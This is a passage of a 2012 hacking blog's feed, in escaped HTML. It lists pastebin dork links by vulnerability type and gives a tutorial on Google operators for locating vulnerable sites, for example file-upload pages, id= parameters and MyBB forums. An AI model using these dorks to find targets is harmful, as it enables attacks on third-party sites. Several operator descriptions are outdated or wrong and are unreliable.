sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/dzQRHqhu&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/0FqmasC7" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/0FqmasC7&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&amp;lt;-from kobez.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/x1rtqktj" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/x1rtqktj&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&amp;lt;-from kobez.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/APxqavu9" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/APxqavu9&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&amp;lt;-from kobez.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;XSS Cross Site Scripting&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/85JiHniy" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/85JiHniy&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lfi Local File Inclusion&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/FBpYuZRh" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/FBpYuZRh&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;RFI Remote File Inclusion&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/zevqd3fR" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/zevqd3fR&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;RTE Remote File Upload&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/b05LyBm9" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/b05LyBm9&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;LFD Local File Disclosure.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/HBLrBL0B" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/HBLrBL0B&lt;/a&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-5625356929445428396?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/5625356929445428396/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/dorks-using-dorks-finding-dorks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5625356929445428396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5625356929445428396'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/dorks-using-dorks-finding-dorks.html' title='Dorks, using dorks, finding dorks'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-4757836414516560872</id><published>2012-01-31T05:23:00.000+06:00</published><updated>2012-01-31T05:23:14.087+06:00</updated><title type='text'>[tut] Creating google dorks</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Hello, Real steel here whit another tutorial!.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;In this tutorial i will explain how to create your own dorks,&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Advanced dorks!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Do you really think inurl: is the only google dork that you can use?&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Wrong there are many you can use!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: brown; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;br /&gt;intitle:&lt;br /&gt;inurl:&lt;br /&gt;intext:&lt;br /&gt;define:&lt;br /&gt;site:&lt;br /&gt;phonebook:&lt;br /&gt;maps:&lt;br /&gt;book:&lt;br /&gt;froogle:&lt;br /&gt;info:&lt;br /&gt;movie:&lt;br /&gt;weather:&lt;br /&gt;related:&lt;br /&gt;link:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;These also help yo find other things then vulnerables.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Happy googling!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Anyway i was going to show how to use some for finding fulnerables.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;intitle:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;intitle:rte/file_uploud&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(this is an example to find rte vulnerables.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you can use the intitle to find anything in the title of the website.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;which also could be usefull to find downloads or anything else.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;inurl:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;inurl:index.php?id=&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(we allready know this one)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;The inurl basicly looks for enything after the: in the site urls. (obvious)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;intext:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;intext:"powered by mybb"&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(This one is awesome!)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you can find literally everything here.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you could even use the inurl dorks whit this.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;anyway whit this we could find sertain messages in a site whe can use.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;my message looks for all mybb forums.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;which means if i ever find a vulnerable in mybb forum.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and know how to locate it!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;then i can find every mybb forum whit this dork.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;define:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;define:"sql syntax error"&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(google defines you message)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;google will difine this massage and will look for what had this error for example i gave.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;site:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Obvious, google looks for a site.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;site:cocacola&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(google will look for any site related whit cocacola.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;phonebook:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Do i really need to explain this?&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;give in a name and google will look for the phone number related to it.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;maps:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Google will look on google maps for your search.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;book:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;book:java language&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(this will look for any book gogole hase indexed whit java language in it.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Google hase an online library.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if you want to find interesting books use this dork.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;froogle:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Uses froogle search instead of google.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;info:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;info:firefox&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(google uses many info sites.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This is usefull.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;google looks for anything you inputted but only information about it.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the example i gave firefox.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;google will get you alot off things explaining what firefox is.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;movie:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if you do this,&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;you can find alot about movies on google.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;movie:watch hackers2 online&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;together whit some of your own context google will serve you any movie.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; 